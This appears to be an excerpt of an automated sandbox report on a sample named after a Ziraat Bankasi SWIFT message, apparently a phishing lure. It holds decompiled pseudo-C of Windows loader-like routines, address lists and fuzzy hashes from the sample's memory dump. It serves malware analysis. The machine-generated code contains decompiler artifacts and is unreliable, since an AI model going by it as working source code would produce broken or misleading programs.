                                                                    									_t256 = _t256 + 0xc;
                                                                    								}
                                                                    								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
                                                                    								E018AFFB0(_t210, _t249, _t249);
                                                                    								_t222 = _v76;
                                                                    								_t172 = _v80;
                                                                    								_t208 = _v84;
                                                                    								_t247 = _v88;
                                                                    								L10:
                                                                    								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
                                                                    								_v44 = _t238;
                                                                    								if(_t238 != 0) {
                                                                    									 *0x198b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
                                                                    									_v44();
                                                                    								}
                                                                    								_pop(_t248);
                                                                    								_pop(_t252);
                                                                    								_pop(_t209);
                                                                    								return E018DB640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
                                                                    							}
                                                                    							_t181 = _v92;
                                                                    							L31:
                                                                    							_t226 = _t226 + 1;
                                                                    							_t181 =  &(_t181[0x18]);
                                                                    							_v88 = _t226;
                                                                    							_v92 = _t181;
                                                                    						} while (_t226 < 4);
                                                                    						goto L34;
                                                                    					}
                                                                    					L9:
                                                                    					_t172 = _v104;
                                                                    					_t222 = _v100;
                                                                    					goto L10;
                                                                    				}
                                                                    				_t247 = _t246 | 0xffffffff;
                                                                    				_t208 = _t247;
                                                                    				_v84 = _t247;
                                                                    				_v80 = _t208;
                                                                    				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
                                                                    					_t233 = _v72;
                                                                    					_v105 = _v64;
                                                                    					_t202 = _v76;
                                                                    				} else {
                                                                    					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
                                                                    					_v105 = 1;
                                                                    					if(_v63 <= _t204) {
                                                                    						_v63 = _t204;
                                                                    					}
                                                                    					_t202 = _v76 |  *(_t251 + 0x40);
                                                                    					_t233 = _v72 |  *(_t251 + 0x44);
                                                                    					_t247 =  *(_t251 + 0x38);
                                                                    					_t208 =  *(_t251 + 0x3c);
                                                                    					_v76 = _t202;
                                                                    					_v72 = _t233;
                                                                    					_v84 = _t247;
                                                                    					_v80 = _t208;
                                                                    				}
                                                                    				_v104 = _t202;
                                                                    				_v100 = _t233;
                                                                    				if( *((char*)(_t251 + 0xc4)) != 0) {
                                                                    					_t237 = _v48;
                                                                    					_v105 = 1;
                                                                    					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
                                                                    						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
                                                                    						_t237 = _v48;
                                                                    					}
                                                                    					_t203 = _t202 |  *(_t251 + 0xb8);
                                                                    					_t234 = _t233 |  *(_t251 + 0xbc);
                                                                    					_t247 = _t247 &  *(_t251 + 0xb0);
                                                                    					_t208 = _t208 &  *(_t251 + 0xb4);
                                                                    					_v104 = _t203;
                                                                    					_v76 = _t203;
                                                                    					_v100 = _t234;
                                                                    					_v72 = _t234;
                                                                    					_v84 = _t247;
                                                                    					_v80 = _t208;
                                                                    				}
                                                                    				if(_v105 == 0) {
                                                                    					_v36 = _v36 & 0x00000000;
                                                                    					_t208 = 0;
                                                                    					_t247 = 0;
                                                                    					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
                                                                    					goto L19;
                                                                    				} else {
                                                                    					_v36 = 1;
                                                                    					goto L8;
                                                                    				}
                                                                    			}































































                                                                    0x018c5142
                                                                    0x018c514c
                                                                    0x018c5150
                                                                    0x018c5157
                                                                    0x018c5159
                                                                    0x018c515e
                                                                    0x018c5165
                                                                    0x018c5169
                                                                    0x018c516c
                                                                    0x018c5172
                                                                    0x018c5176
                                                                    0x018c517a
                                                                    0x018c517a
                                                                    0x018c517a
                                                                    0x018c517f
                                                                    0x01906d8b
                                                                    0x01906d8e
                                                                    0x01906d91
                                                                    0x01906d95
                                                                    0x01906d98
                                                                    0x01906d9c
                                                                    0x01906da0
                                                                    0x01906da3
                                                                    0x01906da7
                                                                    0x01906e26
                                                                    0x01906e26
                                                                    0x01906e2a
                                                                    0x018c51f9
                                                                    0x018c51f9
                                                                    0x018c51fe
                                                                    0x01906e33
                                                                    0x01906e33
                                                                    0x01906e39
                                                                    0x01906e3d
                                                                    0x01906e46
                                                                    0x01906e50
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01906e52
                                                                    0x01906e53
                                                                    0x01906e56
                                                                    0x01906e5d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01906e5f
                                                                    0x01906e67
                                                                    0x01906e77
                                                                    0x01906e7f
                                                                    0x01906e80
                                                                    0x01906e88
                                                                    0x01906e90
                                                                    0x01906e9f
                                                                    0x01906ea5
                                                                    0x01906ea9
                                                                    0x01906eb1
                                                                    0x01906ebf
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01906ecf
                                                                    0x01906ed3
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01906edb
                                                                    0x01906ede
                                                                    0x01906ee1
                                                                    0x01906ee8
                                                                    0x01906eeb
                                                                    0x01906eed
                                                                    0x01906ef0
                                                                    0x01906ef4
                                                                    0x01906ef8
                                                                    0x01906efc
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01906f0d
                                                                    0x01906f11
                                                                    0x01906f32
                                                                    0x01906f37
                                                                    0x01906f3b
                                                                    0x01906f3e
                                                                    0x01906f41
                                                                    0x01906f46
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01906f4c
                                                                    0x01906f50
                                                                    0x01906f50
                                                                    0x01906f54
                                                                    0x01906f62
                                                                    0x01906f65
                                                                    0x01906f6d
                                                                    0x01906f7b
                                                                    0x01906f7b
                                                                    0x01906f93
                                                                    0x01906f98
                                                                    0x01906fa0
                                                                    0x01906fa6
                                                                    0x01906fb3
                                                                    0x01906fb6
                                                                    0x01906fbf
                                                                    0x01906fc1
                                                                    0x01906fd5
                                                                    0x01906fda
                                                                    0x01906fda
                                                                    0x01906fdd
                                                                    0x01906fe2
                                                                    0x01906fe7
                                                                    0x01906feb
                                                                    0x01906fef
                                                                    0x01906ff3
                                                                    0x018c520c
                                                                    0x018c520c
                                                                    0x018c520f
                                                                    0x018c5215
                                                                    0x018c5234
                                                                    0x018c523a
                                                                    0x018c523a
                                                                    0x018c5244
                                                                    0x018c5245
                                                                    0x018c5246
                                                                    0x018c5251
                                                                    0x018c5251
                                                                    0x01906f13
                                                                    0x01906f17
                                                                    0x01906f17
                                                                    0x01906f18
                                                                    0x01906f1b
                                                                    0x01906f1f
                                                                    0x01906f23
                                                                    0x00000000
                                                                    0x01906f28
                                                                    0x018c5204
                                                                    0x018c5204
                                                                    0x018c5208
                                                                    0x00000000
                                                                    0x018c5208
                                                                    0x018c5185
                                                                    0x018c5188
                                                                    0x018c518a
                                                                    0x018c518e
                                                                    0x018c5195
                                                                    0x01906db1
                                                                    0x01906db5
                                                                    0x01906db9
                                                                    0x018c519b
                                                                    0x018c519b
                                                                    0x018c519e
                                                                    0x018c51a7
                                                                    0x018c51a9
                                                                    0x018c51a9
                                                                    0x018c51b5
                                                                    0x018c51b8
                                                                    0x018c51bb
                                                                    0x018c51be
                                                                    0x018c51c1
                                                                    0x018c51c5
                                                                    0x018c51c9
                                                                    0x018c51cd
                                                                    0x018c51cd
                                                                    0x018c51d8
                                                                    0x018c51dc
                                                                    0x018c51e0
                                                                    0x01906dcc
                                                                    0x01906dd0
                                                                    0x01906dd5
                                                                    0x01906ddd
                                                                    0x01906de1
                                                                    0x01906de1
                                                                    0x01906de5
                                                                    0x01906deb
                                                                    0x01906df1
                                                                    0x01906df7
                                                                    0x01906dfd
                                                                    0x01906e01
                                                                    0x01906e05
                                                                    0x01906e09
                                                                    0x01906e0d
                                                                    0x01906e11
                                                                    0x01906e11
                                                                    0x018c51eb
                                                                    0x01906e1a
                                                                    0x01906e1f
                                                                    0x01906e21
                                                                    0x01906e23
                                                                    0x00000000
                                                                    0x018c51f1
                                                                    0x018c51f1
                                                                    0x00000000
                                                                    0x018c51f1

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID: DebugPrintTimes
                                                                    • String ID:
                                                                    • API String ID: 3446177414-0
                                                                    • Opcode ID: 14460e96fb036e18dbc8695f8a4b72035759115f919509a1c1d1b25072dea2ff
                                                                    • Instruction ID: 10b81105055641d0fcf347704865b502ac06aade9ce3a2e3b9f0f49bccc6a383
                                                                    • Opcode Fuzzy Hash: 14460e96fb036e18dbc8695f8a4b72035759115f919509a1c1d1b25072dea2ff
                                                                    • Instruction Fuzzy Hash: 2EC133756083818FD755CF28C480A5AFBF1BF88704F188A6EF9998B392D771E945CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 74%
                                                                    			E018C03E2(signed int __ecx, signed int __edx) {
                                                                    				signed int _v8;
                                                                    				signed int _v12;
                                                                    				signed int _v16;
                                                                    				signed int _v20;
                                                                    				signed int _v24;
                                                                    				signed int _v28;
                                                                    				signed int _v32;
                                                                    				signed int _v36;
                                                                    				intOrPtr _v40;
                                                                    				signed int _v44;
                                                                    				signed int _v48;
                                                                    				char _v52;
                                                                    				char _v56;
                                                                    				char _v64;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				signed int _t56;
                                                                    				signed int _t58;
                                                                    				char* _t64;
                                                                    				intOrPtr _t65;
                                                                    				signed int _t74;
                                                                    				signed int _t79;
                                                                    				char* _t83;
                                                                    				intOrPtr _t84;
                                                                    				signed int _t93;
                                                                    				signed int _t94;
                                                                    				signed char* _t95;
                                                                    				signed int _t99;
                                                                    				signed int _t100;
                                                                    				signed char* _t101;
                                                                    				signed int _t105;
                                                                    				signed int _t119;
                                                                    				signed int _t120;
                                                                    				void* _t122;
                                                                    				signed int _t123;
                                                                    				signed int _t127;
                                                                    
                                                                    				_v8 =  *0x198d360 ^ _t127;
                                                                    				_t119 = __ecx;
                                                                    				_t105 = __edx;
                                                                    				_t118 = 0;
                                                                    				_v20 = __edx;
                                                                    				_t120 =  *(__ecx + 0x20);
                                                                    				if(E018C0548(__ecx, 0) != 0) {
                                                                    					_t56 = 0xc000022d;
                                                                    					L23:
                                                                    					return E018DB640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
                                                                    				} else {
                                                                    					_v12 = _v12 | 0xffffffff;
                                                                    					_t58 = _t120 + 0x24;
                                                                    					_t109 =  *(_t120 + 0x18);
                                                                    					_t118 = _t58;
                                                                    					_v16 = _t58;
                                                                    					E018AB02A( *(_t120 + 0x18), _t118, 0x14a5);
                                                                    					_v52 = 0x18;
                                                                    					_v48 = 0;
                                                                    					0x840 = 0x40;
                                                                    					if( *0x1987c1c != 0) {
                                                                    					}
                                                                    					_v40 = 0x840;
                                                                    					_v44 = _t105;
                                                                    					_v36 = 0;
                                                                    					_v32 = 0;
                                                                    					if(E018B7D50() != 0) {
                                                                    						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                    					} else {
                                                                    						_t64 = 0x7ffe0384;
                                                                    					}
                                                                    					if( *_t64 != 0) {
                                                                    						_t65 =  *[fs:0x30];
                                                                    						__eflags =  *(_t65 + 0x240) & 0x00000004;
                                                                    						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
                                                                    							_t100 = E018B7D50();
                                                                    							__eflags = _t100;
                                                                    							if(_t100 == 0) {
                                                                    								_t101 = 0x7ffe0385;
                                                                    							} else {
                                                                    								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                    							}
                                                                    							__eflags =  *_t101 & 0x00000020;
                                                                    							if(( *_t101 & 0x00000020) != 0) {
                                                                    								_t118 = _t118 | 0xffffffff;
                                                                    								_t109 = 0x1485;
                                                                    								E01917016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    					_t105 = 0;
                                                                    					while(1) {
                                                                    						_push(0x60);
                                                                    						_push(5);
                                                                    						_push( &_v64);
                                                                    						_push( &_v52);
                                                                    						_push(0x100021);
                                                                    						_push( &_v12);
                                                                    						_t122 = E018D9830();
                                                                    						if(_t122 >= 0) {
                                                                    							break;
                                                                    						}
                                                                    						__eflags = _t122 - 0xc0000034;
                                                                    						if(_t122 == 0xc0000034) {
                                                                    							L38:
                                                                    							_t120 = 0xc0000135;
                                                                    							break;
                                                                    						}
                                                                    						__eflags = _t122 - 0xc000003a;
                                                                    						if(_t122 == 0xc000003a) {
                                                                    							goto L38;
                                                                    						}
                                                                    						__eflags = _t122 - 0xc0000022;
                                                                    						if(_t122 != 0xc0000022) {
                                                                    							break;
                                                                    						}
                                                                    						__eflags = _t105;
                                                                    						if(__eflags != 0) {
                                                                    							break;
                                                                    						}
                                                                    						_t109 = _t119;
                                                                    						_t99 = E019169A6(_t119, __eflags);
                                                                    						__eflags = _t99;
                                                                    						if(_t99 == 0) {
                                                                    							break;
                                                                    						}
                                                                    						_t105 = _t105 + 1;
                                                                    					}
                                                                    					if( !_t120 >= 0) {
                                                                    						L22:
                                                                    						_t56 = _t120;
                                                                    						goto L23;
                                                                    					}
                                                                    					if( *0x1987c04 != 0) {
                                                                    						_t118 = _v12;
                                                                    						_t120 = E0191A7AC(_t119, _t118, _t109);
                                                                    						__eflags = _t120;
                                                                    						if(_t120 >= 0) {
                                                                    							goto L10;
                                                                    						}
                                                                    						__eflags =  *0x1987bd8;
                                                                    						if( *0x1987bd8 != 0) {
                                                                    							L20:
                                                                    							if(_v12 != 0xffffffff) {
                                                                    								_push(_v12);
                                                                    								E018D95D0();
                                                                    							}
                                                                    							goto L22;
                                                                    						}
                                                                    					}
                                                                    					L10:
                                                                    					_push(_v12);
                                                                    					_t105 = _t119 + 0xc;
                                                                    					_push(0x1000000);
                                                                    					_push(0x10);
                                                                    					_push(0);
                                                                    					_push(0);
                                                                    					_push(0xf);
                                                                    					_push(_t105);
                                                                    					_t120 = E018D99A0();
                                                                    					if(_t120 < 0) {
                                                                    						__eflags = _t120 - 0xc000047e;
                                                                    						if(_t120 == 0xc000047e) {
                                                                    							L51:
                                                                    							_t74 = E01913540(_t120);
                                                                    							_t119 = _v16;
                                                                    							_t120 = _t74;
                                                                    							L52:
                                                                    							_t118 = 0x1485;
                                                                    							E0189B1E1(_t120, 0x1485, 0, _t119);
                                                                    							goto L20;
                                                                    						}
                                                                    						__eflags = _t120 - 0xc000047f;
                                                                    						if(_t120 == 0xc000047f) {
                                                                    							goto L51;
                                                                    						}
                                                                    						__eflags = _t120 - 0xc0000462;
                                                                    						if(_t120 == 0xc0000462) {
                                                                    							goto L51;
                                                                    						}
                                                                    						_t119 = _v16;
                                                                    						__eflags = _t120 - 0xc0000017;
                                                                    						if(_t120 != 0xc0000017) {
                                                                    							__eflags = _t120 - 0xc000009a;
                                                                    							if(_t120 != 0xc000009a) {
                                                                    								__eflags = _t120 - 0xc000012d;
                                                                    								if(_t120 != 0xc000012d) {
                                                                    									_v28 = _t119;
                                                                    									_push( &_v56);
                                                                    									_push(1);
                                                                    									_v24 = _t120;
                                                                    									_push( &_v28);
                                                                    									_push(1);
                                                                    									_push(2);
                                                                    									_push(0xc000007b);
                                                                    									_t79 = E018DAAF0();
                                                                    									__eflags = _t79;
                                                                    									if(_t79 >= 0) {
                                                                    										__eflags =  *0x1988474 - 3;
                                                                    										if( *0x1988474 != 3) {
                                                                    											 *0x19879dc =  *0x19879dc + 1;
                                                                    										}
                                                                    									}
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    						goto L52;
                                                                    					}
                                                                    					if(E018B7D50() != 0) {
                                                                    						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                    					} else {
                                                                    						_t83 = 0x7ffe0384;
                                                                    					}
                                                                    					if( *_t83 != 0) {
                                                                    						_t84 =  *[fs:0x30];
                                                                    						__eflags =  *(_t84 + 0x240) & 0x00000004;
                                                                    						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
                                                                    							_t94 = E018B7D50();
                                                                    							__eflags = _t94;
                                                                    							if(_t94 == 0) {
                                                                    								_t95 = 0x7ffe0385;
                                                                    							} else {
                                                                    								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                    							}
                                                                    							__eflags =  *_t95 & 0x00000020;
                                                                    							if(( *_t95 & 0x00000020) != 0) {
                                                                    								E01917016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
                                                                    						if( *0x1988708 != 0) {
                                                                    							_t118 =  *0x7ffe0330;
                                                                    							_t123 =  *0x1987b00; // 0x0
                                                                    							asm("ror esi, cl");
                                                                    							 *0x198b1e0(_v12, _v20, 0x20);
                                                                    							_t93 =  *(_t123 ^  *0x7ffe0330)();
                                                                    							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
                                                                    							asm("sbb esi, esi");
                                                                    							_t120 =  ~_t50 & _t93;
                                                                    						} else {
                                                                    							_t120 = 0;
                                                                    						}
                                                                    					}
                                                                    					if( !_t120 >= 0) {
                                                                    						L19:
                                                                    						_push( *_t105);
                                                                    						E018D95D0();
                                                                    						 *_t105 =  *_t105 & 0x00000000;
                                                                    						goto L20;
                                                                    					}
                                                                    					_t120 = E018A7F65(_t119);
                                                                    					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
                                                                    						__eflags = _t120;
                                                                    						if(_t120 < 0) {
                                                                    							goto L19;
                                                                    						}
                                                                    						 *(_t119 + 0x64) = _v12;
                                                                    						goto L22;
                                                                    					}
                                                                    					goto L19;
                                                                    				}
                                                                    			}








































                                                                    0x018c03f1
                                                                    0x018c03f7
                                                                    0x018c03f9
                                                                    0x018c03fb
                                                                    0x018c03fd
                                                                    0x018c0400
                                                                    0x018c040a
                                                                    0x01904c7a
                                                                    0x018c0537
                                                                    0x018c0547
                                                                    0x018c0410
                                                                    0x018c0410
                                                                    0x018c0414
                                                                    0x018c0417
                                                                    0x018c041a
                                                                    0x018c0421
                                                                    0x018c0424
                                                                    0x018c042b
                                                                    0x018c043b
                                                                    0x018c043e
                                                                    0x018c043f
                                                                    0x018c043f
                                                                    0x018c0446
                                                                    0x018c0449
                                                                    0x018c044c
                                                                    0x018c044f
                                                                    0x018c0459
                                                                    0x01904c8d
                                                                    0x018c045f
                                                                    0x018c045f
                                                                    0x018c045f
                                                                    0x018c0467
                                                                    0x01904c97
                                                                    0x01904c9d
                                                                    0x01904ca4
                                                                    0x01904caa
                                                                    0x01904caf
                                                                    0x01904cb1
                                                                    0x01904cc3
                                                                    0x01904cb3
                                                                    0x01904cbc
                                                                    0x01904cbc
                                                                    0x01904cc8
                                                                    0x01904ccb
                                                                    0x01904cd7
                                                                    0x01904cda
                                                                    0x01904cdf
                                                                    0x01904cdf
                                                                    0x01904ccb
                                                                    0x01904ca4
                                                                    0x018c046d
                                                                    0x018c046f
                                                                    0x018c046f
                                                                    0x018c0471
                                                                    0x018c0476
                                                                    0x018c047a
                                                                    0x018c047b
                                                                    0x018c0483
                                                                    0x018c0489
                                                                    0x018c048d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01904ce9
                                                                    0x01904cef
                                                                    0x01904d22
                                                                    0x01904d22
                                                                    0x00000000
                                                                    0x01904d22
                                                                    0x01904cf1
                                                                    0x01904cf7
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01904cf9
                                                                    0x01904cff
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01904d05
                                                                    0x01904d07
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01904d0d
                                                                    0x01904d0f
                                                                    0x01904d14
                                                                    0x01904d16
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01904d1c
                                                                    0x01904d1c
                                                                    0x018c0499
                                                                    0x018c0535
                                                                    0x018c0535
                                                                    0x00000000
                                                                    0x018c0535
                                                                    0x018c04a6
                                                                    0x01904d2c
                                                                    0x01904d37
                                                                    0x01904d39
                                                                    0x01904d3b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01904d41
                                                                    0x01904d48
                                                                    0x018c0527
                                                                    0x018c052b
                                                                    0x018c052d
                                                                    0x018c0530
                                                                    0x018c0530
                                                                    0x00000000
                                                                    0x018c052b
                                                                    0x01904d4e
                                                                    0x018c04ac
                                                                    0x018c04ac
                                                                    0x018c04af
                                                                    0x018c04b2
                                                                    0x018c04b7
                                                                    0x018c04b9
                                                                    0x018c04bb
                                                                    0x018c04bd
                                                                    0x018c04bf
                                                                    0x018c04c5
                                                                    0x018c04c9
                                                                    0x01904d53
                                                                    0x01904d59
                                                                    0x01904db9
                                                                    0x01904dba
                                                                    0x01904dbf
                                                                    0x01904dc2
                                                                    0x01904dc4
                                                                    0x01904dc7
                                                                    0x01904dce
                                                                    0x00000000
                                                                    0x01904dce
                                                                    0x01904d5b
                                                                    0x01904d61
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01904d63
                                                                    0x01904d69
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01904d6b
                                                                    0x01904d6e
                                                                    0x01904d74
                                                                    0x01904d76
                                                                    0x01904d7c
                                                                    0x01904d7e
                                                                    0x01904d84
                                                                    0x01904d89
                                                                    0x01904d8c
                                                                    0x01904d8d
                                                                    0x01904d92
                                                                    0x01904d95
                                                                    0x01904d96
                                                                    0x01904d98
                                                                    0x01904d9a
                                                                    0x01904d9f
                                                                    0x01904da4
                                                                    0x01904da6
                                                                    0x01904da8
                                                                    0x01904daf
                                                                    0x01904db1
                                                                    0x01904db1
                                                                    0x01904daf
                                                                    0x01904da6
                                                                    0x01904d84
                                                                    0x01904d7c
                                                                    0x00000000
                                                                    0x01904d74
                                                                    0x018c04d6
                                                                    0x01904de1
                                                                    0x018c04dc
                                                                    0x018c04dc
                                                                    0x018c04dc
                                                                    0x018c04e4
                                                                    0x01904deb
                                                                    0x01904df1
                                                                    0x01904df8
                                                                    0x01904dfe
                                                                    0x01904e03
                                                                    0x01904e05
                                                                    0x01904e17
                                                                    0x01904e07
                                                                    0x01904e10
                                                                    0x01904e10
                                                                    0x01904e1c
                                                                    0x01904e1f
                                                                    0x01904e35
                                                                    0x01904e35
                                                                    0x01904e1f
                                                                    0x01904df8
                                                                    0x018c04f1
                                                                    0x018c04fa
                                                                    0x01904e3f
                                                                    0x01904e47
                                                                    0x01904e5b
                                                                    0x01904e61
                                                                    0x01904e67
                                                                    0x01904e69
                                                                    0x01904e71
                                                                    0x01904e73
                                                                    0x018c0500
                                                                    0x018c0500
                                                                    0x018c0500
                                                                    0x018c04fa
                                                                    0x018c0508
                                                                    0x018c051d
                                                                    0x018c051d
                                                                    0x018c051f
                                                                    0x018c0524
                                                                    0x00000000
                                                                    0x018c0524
                                                                    0x018c0515
                                                                    0x018c0517
                                                                    0x01904e7a
                                                                    0x01904e7c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01904e85
                                                                    0x00000000
                                                                    0x01904e85
                                                                    0x00000000
                                                                    0x018c0517

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: afc19ef67eb386a29b5546156a8e917a9dd07108433479cb23bedc264e508764
                                                                    • Instruction ID: dab589f3ec5799337d064a8589c1eb77bc668d7bdc26dad64ba8aab2907d989a
                                                                    • Opcode Fuzzy Hash: afc19ef67eb386a29b5546156a8e917a9dd07108433479cb23bedc264e508764
                                                                    • Instruction Fuzzy Hash: 8E914E35E04259DFEB329B6CC844BAEBBA4AB01B58F050265FB14E72D1D774EE40C781
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 76%
                                                                    			E018BB944(signed int* __ecx, char __edx) {
                                                                    				signed int _v8;
                                                                    				signed int _v16;
                                                                    				signed int _v20;
                                                                    				char _v28;
                                                                    				signed int _v32;
                                                                    				char _v36;
                                                                    				signed int _v40;
                                                                    				intOrPtr _v44;
                                                                    				signed int* _v48;
                                                                    				signed int _v52;
                                                                    				signed int _v56;
                                                                    				intOrPtr _v60;
                                                                    				intOrPtr _v64;
                                                                    				intOrPtr _v68;
                                                                    				intOrPtr _v72;
                                                                    				intOrPtr _v76;
                                                                    				char _v77;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				intOrPtr* _t65;
                                                                    				intOrPtr _t67;
                                                                    				intOrPtr _t68;
                                                                    				char* _t73;
                                                                    				intOrPtr _t77;
                                                                    				intOrPtr _t78;
                                                                    				signed int _t82;
                                                                    				intOrPtr _t83;
                                                                    				void* _t87;
                                                                    				char _t88;
                                                                    				intOrPtr* _t89;
                                                                    				intOrPtr _t91;
                                                                    				void* _t97;
                                                                    				intOrPtr _t100;
                                                                    				void* _t102;
                                                                    				void* _t107;
                                                                    				signed int _t108;
                                                                    				intOrPtr* _t112;
                                                                    				void* _t113;
                                                                    				intOrPtr* _t114;
                                                                    				intOrPtr _t115;
                                                                    				intOrPtr _t116;
                                                                    				intOrPtr _t117;
                                                                    				signed int _t118;
                                                                    				void* _t130;
                                                                    
                                                                    				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                                                                    				_v8 =  *0x198d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                                                                    				_t112 = __ecx;
                                                                    				_v77 = __edx;
                                                                    				_v48 = __ecx;
                                                                    				_v28 = 0;
                                                                    				_t5 = _t112 + 0xc; // 0x575651ff
                                                                    				_t105 =  *_t5;
                                                                    				_v20 = 0;
                                                                    				_v16 = 0;
                                                                    				if(_t105 == 0) {
                                                                    					_t50 = _t112 + 4; // 0x5de58b5b
                                                                    					_t60 =  *__ecx |  *_t50;
                                                                    					if(( *__ecx |  *_t50) != 0) {
                                                                    						 *__ecx = 0;
                                                                    						__ecx[1] = 0;
                                                                    						if(E018B7D50() != 0) {
                                                                    							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                    						} else {
                                                                    							_t65 = 0x7ffe0386;
                                                                    						}
                                                                    						if( *_t65 != 0) {
                                                                    							E01968CD6(_t112);
                                                                    						}
                                                                    						_push(0);
                                                                    						_t52 = _t112 + 0x10; // 0x778df98b
                                                                    						_push( *_t52);
                                                                    						_t60 = E018D9E20();
                                                                    					}
                                                                    					L20:
                                                                    					_pop(_t107);
                                                                    					_pop(_t113);
                                                                    					_pop(_t87);
                                                                    					return E018DB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                                                                    				}
                                                                    				_t8 = _t112 + 8; // 0x8b000cc2
                                                                    				_t67 =  *_t8;
                                                                    				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                                                                    				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                                                                    				_t108 =  *(_t67 + 0x14);
                                                                    				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                                                                    				_t105 = 0x2710;
                                                                    				asm("sbb eax, edi");
                                                                    				_v44 = _t88;
                                                                    				_v52 = _t108;
                                                                    				_t60 = E018DCE00(_t97, _t68, 0x2710, 0);
                                                                    				_v56 = _t60;
                                                                    				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                                                                    					L3:
                                                                    					 *(_t112 + 0x44) = _t60;
                                                                    					_t105 = _t60 * 0x2710 >> 0x20;
                                                                    					 *_t112 = _t88;
                                                                    					 *(_t112 + 4) = _t108;
                                                                    					_v20 = _t60 * 0x2710;
                                                                    					_v16 = _t60 * 0x2710 >> 0x20;
                                                                    					if(_v77 != 0) {
                                                                    						L16:
                                                                    						_v36 = _t88;
                                                                    						_v32 = _t108;
                                                                    						if(E018B7D50() != 0) {
                                                                    							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                    						} else {
                                                                    							_t73 = 0x7ffe0386;
                                                                    						}
                                                                    						if( *_t73 != 0) {
                                                                    							_t105 = _v40;
                                                                    							E01968F6A(_t112, _v40, _t88, _t108);
                                                                    						}
                                                                    						_push( &_v28);
                                                                    						_push(0);
                                                                    						_push( &_v36);
                                                                    						_t48 = _t112 + 0x10; // 0x778df98b
                                                                    						_push( *_t48);
                                                                    						_t60 = E018DAF60();
                                                                    						goto L20;
                                                                    					} else {
                                                                    						_t89 = 0x7ffe03b0;
                                                                    						do {
                                                                    							_t114 = 0x7ffe0010;
                                                                    							do {
                                                                    								_t77 =  *0x1988628; // 0x0
                                                                    								_v68 = _t77;
                                                                    								_t78 =  *0x198862c; // 0x0
                                                                    								_v64 = _t78;
                                                                    								_v72 =  *_t89;
                                                                    								_v76 =  *((intOrPtr*)(_t89 + 4));
                                                                    								while(1) {
                                                                    									_t105 =  *0x7ffe000c;
